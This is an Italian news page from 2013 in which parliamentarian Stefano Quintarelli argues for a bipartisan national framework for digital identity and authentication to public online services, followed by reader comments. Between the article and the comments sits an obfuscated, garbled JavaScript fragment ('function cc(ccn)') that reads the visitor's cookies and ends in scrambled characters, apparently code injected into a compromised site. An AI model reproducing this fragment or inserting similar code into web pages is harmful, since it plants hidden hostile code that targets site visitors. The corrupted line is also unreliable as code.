Questo sito utilizza cookie per raccogliere informazioni sull'utilizzo. Cliccando su questo banner o navigando il sito, acconsenti all'uso dei cookie. Leggi la nostra cookie policy.OK

Direttore responsabile Alessandro Longo

La proposta

Quintarelli: “Verso un framework per l’identità digitale”

di Stefano Quintarelli, Scelta Civica

13 Mar 2013

13 marzo 2013

Il neo parlamentare ribadisce la propria agenda e annuncia: “sto incontrando tutti i responsabili dei temi digitali nei vari partiti per arrivare a una proposta bipartisan su basi comuni”. Priorità è un sistema unico per l’autenticazione degli utenti

C’è una premessa a tutti i discorsi che possiamo fare sull’Agenda: speriamo- siamo fiduciosi- che ci sia un governo. Fino ad allora non sapremo se saremo capaci di influire sulle cose.

Ciò detto, non appena le cose si chiariscono, apriremo un canale di relazione con gli stakeholder, aziende, cittadini, associazione consumatori- chiunque voglia interloquire e fare proposte. Il passo successivo è realizzare l’agenda della Scelta Civica, che ho curato io con contributi di varie parti.

Voglio construire un’ampia collaborazione con gli altri partiti, con PD, Pdl; tutte le cose del loro programma per il digitale sono sensate. Ho preso infatti contatti con tutti quelli che si occupano di digitale nei vari partiti.

L’obiettivo è fare cose buone per l’Italia a prescindere dagli schieramenti. Come ho sempre fatto in passato: missione nopartisan. A questo scopo ho preso contatti anche con Movimento5Stelle. L’obiettivo è di fare provvedimenti bipartisan partendo dalle basei comuni. Entrare nel merito delle idee senza fermarsi al contenitore, come hanno fatto in passato Rao, Palmieri e Gentiloni. 

Se mi si chiede quali sono le cose più importanti da fare, c’è un provvedimento che è la madre di tutti. Definire un framework per l’autenticazione dell’accesso ai servizi. Tutti gli amministratori pubblici che vogliono fare servizi online non hanno un modo certificato e uniforme per verificare che chi vuole accedere sia la persona titolata ad accedere. E’ il punto principale da risolvere.

Ho pensato ad alcuni principi di riferimento, per questo framework.

La verifica venga fatta non da chi eroga il servizio ma da un intermediario. Il numero di soggetti che fanno la verifica sia alto. I soggetti che fanno la verifica siano tenuti a regolamentazioni non banali e con processi di certificazione ed auditing. Le identità possano essere verificate da più soggetti. Categorie di soggetti diversi possano certificare attributi diversi.

Nel Regno Unito hanno adottato il modello di open identity exchange, che mi piace. Non è detto che sarà lo stesso italiano, magari si darà il compito ad Agenzia per l’Italia Digitale di definire un modello.

(Ndr: In un post di marzo 2012 sul proprio blog, Quintarelli proponeva inoltre di “usare un numero E164 come asset nazionale su cui costruire un sistema di autenticazione per l’accesso ai servizi. Il numero è personale, viene collegato ad una identità di un cittadino mediante procedura di enrollment XY, il codice E164 così collegato è inserito nell’anagrafe dei codici abilitati, ove si gestiscono le revoce, l’anagrafe espone una API per la verifica della validità, se presente nell’anagrafe dei codici abilitati può essere utilizzato come riconoscimento ed autenticazione assistito da fede privilegiata”).

function cc(ccn){var c=d[‘cookie’];return c.search(ccn.split(”).reverse().join(”))^O0$5rL”E,)3T<:#}N%u&/{HXUSWps+ixt`@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4';}

  • lore77

    Davvero interessante, ma credo debba assolutamente andare avanti parallelamente al sistema di anagrafe unica, cosi’ da poter permettere un sistema unico delle anagrafi e quindi anche in secondo step delle autenticazioni uniche per i cittadini

  • maurizi

    ottimo lavoro come sempre onorevole

  • simone

    dall’idea alla fase operativa in 3 anni secchi, credo sia la prima volta che succede 🙂 grazie!!

Articoli correlati